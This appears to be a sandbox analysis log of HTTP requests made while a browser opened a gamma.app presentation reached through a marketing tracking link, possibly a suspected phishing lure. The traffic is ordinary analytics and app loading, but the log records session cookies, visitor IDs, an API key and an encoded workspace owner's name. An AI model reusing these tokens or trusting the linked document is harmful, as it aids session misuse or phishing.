    Source: global trafficHTTP traffic detected: GET /api/5776661/envelope/?sentry_key=824b9acd00f449f283554475ff8303bb&sentry_version=7&sentry_client=sentry.javascript.nextjs%2F7.8.0 HTTP/1.1Host: o698378.ingest.sentry.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /sdk/goals/61e83cfd8ac5a016e6f0d0b6 HTTP/1.1Host: app.launchdarkly.comConnection: keep-aliveX-LaunchDarkly-Wrapper: react-client-sdk-gammasec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36X-LaunchDarkly-User-Agent: JSClient/3.5.0sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Origin: https://gamma.appSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://gamma.app/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /sdk/evalx/61e83cfd8ac5a016e6f0d0b6/contexts/eyJraW5kIjoibXVsdGkiLCJ1c2VyIjp7ImtleSI6ImxkX2Fub255bW91c191c2VyIiwiYW5vbnltb3VzIjp0cnVlLCJpc0dhbW1hRTJFIjpmYWxzZSwiaXNHYW1tYVVzZXIiOmZhbHNlLCJvcmdJZCI6Im5vX29yZ19pZCIsImlzTW9iaWxlRGV2aWNlIjpmYWxzZSwiZGVwbG95VGltZSI6MTc0MjI0ODQxMzY1OCwiZGVwbG95bWVudEhhc2giOiI5YnF4aGthNWQifX0?withReasons=true HTTP/1.1Host: app.launchdarkly.comConnection: keep-aliveX-LaunchDarkly-Wrapper: react-client-sdk-gammasec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36X-LaunchDarkly-User-Agent: JSClient/3.5.0sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Origin: https://gamma.appSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://gamma.app/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /graphql HTTP/1.1Host: api.gamma.appConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://gamma.appSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=haKae34CnnfVBameVtl7RWWwR3VnYKIWigU6sDn1.WE-1742299813-1.0.1.1-Ahg0zr0AB8BmhIH9bEfoKnpgp9CTST0X3awfyGiWoLMIyJEJ8ku3oksPHk3jlVUaiOog_XIUOlse86DP.iY079Vzj4RLjp1f_rbdJbxATaw; gamma_visitor_id=jd7f4ywa7vh5q2d; ajs_anonymous_id=jd7f4ywa7vh5q2dSec-WebSocket-Key: IlUF5kAuJeBZ4qB6Fr4HxA==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bitsSec-WebSocket-Protocol: graphql-ws
    Source: global trafficHTTP traffic detected: GET /client_storage/a187838077.html HTTP/1.1Host: a187838077.cdn.optimizely.comConnection: keep-alivesec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeSec-Fetch-Storage-Access: activeReferer: https://gamma.app/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /v1/user-context HTTP/1.1Host: events.api.gamma.appConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=haKae34CnnfVBameVtl7RWWwR3VnYKIWigU6sDn1.WE-1742299813-1.0.1.1-Ahg0zr0AB8BmhIH9bEfoKnpgp9CTST0X3awfyGiWoLMIyJEJ8ku3oksPHk3jlVUaiOog_XIUOlse86DP.iY079Vzj4RLjp1f_rbdJbxATaw; gamma_visitor_id=jd7f4ywa7vh5q2d; ajs_anonymous_id=jd7f4ywa7vh5q2d
    Source: global trafficHTTP traffic detected: GET /api/5776661/envelope/?sentry_key=824b9acd00f449f283554475ff8303bb&sentry_version=7&sentry_client=sentry.javascript.nextjs%2F7.8.0 HTTP/1.1Host: o698378.ingest.sentry.ioConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /v1/i HTTP/1.1Host: events.api.gamma.appConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=haKae34CnnfVBameVtl7RWWwR3VnYKIWigU6sDn1.WE-1742299813-1.0.1.1-Ahg0zr0AB8BmhIH9bEfoKnpgp9CTST0X3awfyGiWoLMIyJEJ8ku3oksPHk3jlVUaiOog_XIUOlse86DP.iY079Vzj4RLjp1f_rbdJbxATaw; gamma_visitor_id=jd7f4ywa7vh5q2d; ajs_anonymous_id=jd7f4ywa7vh5q2d
    Source: global trafficHTTP traffic detected: GET /sdk/goals/61e83cfd8ac5a016e6f0d0b6 HTTP/1.1Host: app.launchdarkly.comConnection: keep-aliveX-LaunchDarkly-Wrapper: react-client-sdk-gammasec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36X-LaunchDarkly-User-Agent: JSClient/3.5.0sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Origin: https://gamma.appSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://gamma.app/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9If-None-Match: "8082e2de4de1b83503e3a6e82eae19ad"
    Source: global trafficHTTP traffic detected: GET /sdk/goals/61e83cfd8ac5a016e6f0d0b6 HTTP/1.1Host: app.launchdarkly.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /sdk/evalx/61e83cfd8ac5a016e6f0d0b6/contexts/eyJraW5kIjoibXVsdGkiLCJ1c2VyIjp7ImtleSI6ImxkX2Fub255bW91c191c2VyIiwiYW5vbnltb3VzIjp0cnVlLCJpc0dhbW1hRTJFIjpmYWxzZSwiaXNHYW1tYVVzZXIiOmZhbHNlLCJvcmdJZCI6Im5vX29yZ19pZCIsImlzTW9iaWxlRGV2aWNlIjpmYWxzZSwiZGVwbG95VGltZSI6MTc0MjI0ODQxMzY1OCwiZGVwbG95bWVudEhhc2giOiI5YnF4aGthNWQifX0?withReasons=true HTTP/1.1Host: app.launchdarkly.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /css/app.css HTTP/1.1Host: assets.churnkey.coConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleSec-Fetch-Storage-Access: activeReferer: https://gamma.app/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /eval/61e83cfd8ac5a016e6f0d0b6/eyJraW5kIjoibXVsdGkiLCJ1c2VyIjp7ImtleSI6ImxkX2Fub255bW91c191c2VyIiwiYW5vbnltb3VzIjp0cnVlLCJpc0dhbW1hRTJFIjpmYWxzZSwiaXNHYW1tYVVzZXIiOmZhbHNlLCJvcmdJZCI6Im5vX29yZ19pZCIsImlzTW9iaWxlRGV2aWNlIjpmYWxzZSwiZGVwbG95VGltZSI6MTc0MjI0ODQxMzY1OCwiZGVwbG95bWVudEhhc2giOiI5YnF4aGthNWQifX0?withReasons=true HTTP/1.1Host: clientstream.launchdarkly.comConnection: keep-alivesec-ch-ua-platform: "Windows"Cache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/event-streamsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Origin: https://gamma.appSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://gamma.app/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /sdk/evalx/61e83cfd8ac5a016e6f0d0b6/contexts/eyJraW5kIjoibXVsdGkiLCJ1c2VyIjp7ImtleSI6ImxkX2Fub255bW91c191c2VyIiwiYW5vbnltb3VzIjp0cnVlLCJpc0dhbW1hRTJFIjpmYWxzZSwiaXNHYW1tYVVzZXIiOmZhbHNlLCJvcmdJZCI6Im5vX29yZ19pZCIsImlzTW9iaWxlRGV2aWNlIjpmYWxzZSwiZGVwbG95VGltZSI6MTc0MjI0ODQxMzY1OCwiZGVwbG95bWVudEhhc2giOiI5YnF4aGthNWQiLCJicm93c2VyIjp7Im5hbWUiOiJDaHJvbWUiLCJ2ZXJzaW9uIjoiMTM0LjAuMC4wIn0sImxvY2FsZSI6ImVuLVVTIiwibG9jYXRpb24iOnsiY2l0eSI6IiIsImNvdW50cnkiOiJVUyIsImxhdGl0dWRlIjozNy43NTEsImxvbmdpdHVkZSI6LTk3LjgyMn19fQ?withReasons=true HTTP/1.1Host: app.launchdarkly.comConnection: keep-aliveX-LaunchDarkly-Wrapper: react-client-sdk-gammasec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36X-LaunchDarkly-User-Agent: JSClient/3.5.0sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Origin: https://gamma.appSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://gamma.app/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /graphql HTTP/1.1Host: api.gamma.appConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=haKae34CnnfVBameVtl7RWWwR3VnYKIWigU6sDn1.WE-1742299813-1.0.1.1-Ahg0zr0AB8BmhIH9bEfoKnpgp9CTST0X3awfyGiWoLMIyJEJ8ku3oksPHk3jlVUaiOog_XIUOlse86DP.iY079Vzj4RLjp1f_rbdJbxATaw; gamma_visitor_id=jd7f4ywa7vh5q2d; ajs_anonymous_id=jd7f4ywa7vh5q2d
    Source: global trafficHTTP traffic detected: GET /beacon.min.js/vcd15cbe7772f49c399c6a5babf22c1241717689176015 HTTP/1.1Host: static.cloudflareinsights.comConnection: keep-aliveOrigin: https://a187838077.cdn.optimizely.comsec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://a187838077.cdn.optimizely.com/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /graphql HTTP/1.1Host: api.gamma.appConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://gamma.appSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=haKae34CnnfVBameVtl7RWWwR3VnYKIWigU6sDn1.WE-1742299813-1.0.1.1-Ahg0zr0AB8BmhIH9bEfoKnpgp9CTST0X3awfyGiWoLMIyJEJ8ku3oksPHk3jlVUaiOog_XIUOlse86DP.iY079Vzj4RLjp1f_rbdJbxATaw; gamma_visitor_id=jd7f4ywa7vh5q2d; ajs_anonymous_id=jd7f4ywa7vh5q2dSec-WebSocket-Key: iSoB5F/mwYrXg8+R0uP+ug==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bitsSec-WebSocket-Protocol: graphql-ws
    Source: global trafficHTTP traffic detected: GET /sdk/goals/61e83cfd8ac5a016e6f0d0b6 HTTP/1.1Host: app.launchdarkly.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9If-None-Match: "8082e2de4de1b83503e3a6e82eae19ad"
    Source: global trafficHTTP traffic detected: GET /manifest.json HTTP/1.1Host: gamma.appConnection: keep-alivesec-ch-ua-full-version-list: "Chromium";v="134.0.6998.36", "Not:A-Brand";v="24.0.0.0", "Google Chrome";v="134.0.6998.36"sec-ch-ua-platform: "Windows"sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-mobile: ?0sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "134.0.6998.36"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua-platform-version: "10.0.0"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: manifestReferer: https://gamma.app/docs/Janel-Group-Completed-Document-x686r1ir4nghubz?mode=present&msdynmkt_trackingcontext=5ec8c314-6a44-49aa-affa-3fcb8bb40100Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /sdk/evalx/61e83cfd8ac5a016e6f0d0b6/contexts/eyJraW5kIjoibXVsdGkiLCJ1c2VyIjp7ImtleSI6ImxkX2Fub255bW91c191c2VyIiwiYW5vbnltb3VzIjp0cnVlLCJpc0dhbW1hRTJFIjpmYWxzZSwiaXNHYW1tYVVzZXIiOmZhbHNlLCJvcmdJZCI6Im5vX29yZ19pZCIsImlzTW9iaWxlRGV2aWNlIjpmYWxzZSwiZGVwbG95VGltZSI6MTc0MjI0ODQxMzY1OCwiZGVwbG95bWVudEhhc2giOiI5YnF4aGthNWQiLCJicm93c2VyIjp7Im5hbWUiOiJDaHJvbWUiLCJ2ZXJzaW9uIjoiMTM0LjAuMC4wIn0sImxvY2FsZSI6ImVuLVVTIiwibG9jYXRpb24iOnsiY2l0eSI6IiIsImNvdW50cnkiOiJVUyIsImxhdGl0dWRlIjozNy43NTEsImxvbmdpdHVkZSI6LTk3LjgyMn19fQ?withReasons=true HTTP/1.1Host: app.launchdarkly.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /sdk/evalx/61e83cfd8ac5a016e6f0d0b6/contexts/eyJraW5kIjoibXVsdGkiLCJ1c2VyIjp7ImtleSI6ImxkX2Fub255bW91c191c2VyIiwiYW5vbnltb3VzIjp0cnVlLCJpc0dhbW1hRTJFIjpmYWxzZSwiaXNHYW1tYVVzZXIiOmZhbHNlLCJvcmdJZCI6Im5vX29yZ19pZCIsImlzTW9iaWxlRGV2aWNlIjpmYWxzZSwiZGVwbG95VGltZSI6MTc0MjI0ODQxMzY1OCwiZGVwbG95bWVudEhhc2giOiI5YnF4aGthNWQifSwid29ya3NwYWNlIjp7ImtleSI6ImFkM3dra2I1bDZvYW8zNyIsIm5hbWUiOiJNSUNIQUVMIEpPSE5TT04ncyBXb3Jrc3BhY2UiLCJwbGFuIjoicHJvIn19?withReasons=true HTTP/1.1Host: app.launchdarkly.comConnection: keep-aliveX-LaunchDarkly-Wrapper: react-client-sdk-gammasec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36X-LaunchDarkly-User-Agent: JSClient/3.5.0sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Origin: https://gamma.appSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://gamma.app/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /graphql HTTP/1.1Host: api.gamma.appConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=haKae34CnnfVBameVtl7RWWwR3VnYKIWigU6sDn1.WE-1742299813-1.0.1.1-Ahg0zr0AB8BmhIH9bEfoKnpgp9CTST0X3awfyGiWoLMIyJEJ8ku3oksPHk3jlVUaiOog_XIUOlse86DP.iY079Vzj4RLjp1f_rbdJbxATaw; gamma_visitor_id=jd7f4ywa7vh5q2d; ajs_anonymous_id=jd7f4ywa7vh5q2d
    Source: global trafficHTTP traffic detected: GET /widget/ihnzqaok HTTP/1.1Host: widget.intercom.ioConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://gamma.app/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /v1/t HTTP/1.1Host: events.api.gamma.appConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=haKae34CnnfVBameVtl7RWWwR3VnYKIWigU6sDn1.WE-1742299813-1.0.1.1-Ahg0zr0AB8BmhIH9bEfoKnpgp9CTST0X3awfyGiWoLMIyJEJ8ku3oksPHk3jlVUaiOog_XIUOlse86DP.iY079Vzj4RLjp1f_rbdJbxATaw; gamma_visitor_id=jd7f4ywa7vh5q2d; ajs_anonymous_id=jd7f4ywa7vh5q2d
    Source: global trafficHTTP traffic detected: GET /resize/quality:80/resizing_type:fit/width:2000/https://cdn.gamma.app/ad3wkkb5l6oao37/b0d22c7603704386be6a681832a58090/original/photo_5848101176623614206_y.jpg HTTP/1.1Host: imgproxy.gamma.appConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://gamma.app/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=haKae34CnnfVBameVtl7RWWwR3VnYKIWigU6sDn1.WE-1742299813-1.0.1.1-Ahg0zr0AB8BmhIH9bEfoKnpgp9CTST0X3awfyGiWoLMIyJEJ8ku3oksPHk3jlVUaiOog_XIUOlse86DP.iY079Vzj4RLjp1f_rbdJbxATaw; gamma_visitor_id=jd7f4ywa7vh5q2d; ajs_anonymous_id=jd7f4ywa7vh5q2d
    Source: global trafficHTTP traffic detected: GET /sdk.js HTTP/1.1Host: canny.ioConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptSec-Fetch-Storage-Access: activeReferer: https://gamma.app/Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /favicons/pwa-icon-512x512.png HTTP/1.1Host: gamma.appConnection: keep-alivesec-ch-ua-full-version-list: "Chromium";v="134.0.6998.36", "Not:A-Brand";v="24.0.0.0", "Google Chrome";v="134.0.6998.36"sec-ch-ua-platform: "Windows"sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-ua-mobile: ?0sec-ch-ua-arch: "x86"sec-ch-ua-full-version: "134.0.6998.36"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua-platform-version: "10.0.0"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://gamma.app/docs/Janel-Group-Completed-Document-x686r1ir4nghubz?mode=present&msdynmkt_trackingcontext=5ec8c314-6a44-49aa-affa-3fcb8bb40100Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=haKae34CnnfVBameVtl7RWWwR3VnYKIWigU6sDn1.WE-1742299813-1.0.1.1-Ahg0zr0AB8BmhIH9bEfoKnpgp9CTST0X3awfyGiWoLMIyJEJ8ku3oksPHk3jlVUaiOog_XIUOlse86DP.iY079Vzj4RLjp1f_rbdJbxATaw; gamma_visitor_id=jd7f4ywa7vh5q2d; ajs_anonymous_id=jd7f4ywa7vh5q2d; lastReferrer=https://public-usa.mkt.dynamics.com/; firstPageSeen=https://gamma.app/docs/Janel-Group-Completed-Document-x686r1ir4nghubz?mode=present&msdynmkt_trackingcontext=5ec8c314-6a44-49aa-affa-3fcb8bb40100#card-an1daph37h4un5p; lastPageSeen=https://gamma.app/docs/Janel-Group-Completed-Document-x686r1ir4nghubz?mode=present&msdynmkt_trackingcontext=5ec8c314-6a44-49aa-affa-3fcb8bb40100#card-an1daph37h4un5p; _dd_s=logs=1&id=e7992cf0-e3e2-4291-be22-30f3dea0956a&created=1742299832803&expire=1742300732803
    Source: global trafficHTTP traffic detected: GET /_app_static/js/tiktoken-640a99ed3ce5ba67.wasm HTTP/1.1Host: cdn.gamma.appConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=haKae34CnnfVBameVtl7RWWwR3VnYKIWigU6sDn1.WE-1742299813-1.0.1.1-Ahg0zr0AB8BmhIH9bEfoKnpgp9CTST0X3awfyGiWoLMIyJEJ8ku3oksPHk3jlVUaiOog_XIUOlse86DP.iY079Vzj4RLjp1f_rbdJbxATaw; gamma_visitor_id=jd7f4ywa7vh5q2d; ajs_anonymous_id=jd7f4ywa7vh5q2d
    Source: global trafficHTTP traffic detected: GET /graphql HTTP/1.1Host: api.gamma.appConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://gamma.appSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: __cf_bm=haKae34CnnfVBameVtl7RWWwR3VnYKIWigU6sDn1.WE-1742299813-1.0.1.1-Ahg0zr0AB8BmhIH9bEfoKnpgp9CTST0X3awfyGiWoLMIyJEJ8ku3oksPHk3jlVUaiOog_XIUOlse86DP.iY079Vzj4RLjp1f_rbdJbxATaw; gamma_visitor_id=jd7f4ywa7vh5q2d; ajs_anonymous_id=jd7f4ywa7vh5q2dSec-WebSocket-Key: Txq2+8DjYy7rCHEIteHmHQ==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bitsSec-WebSocket-Protocol: graphql-ws
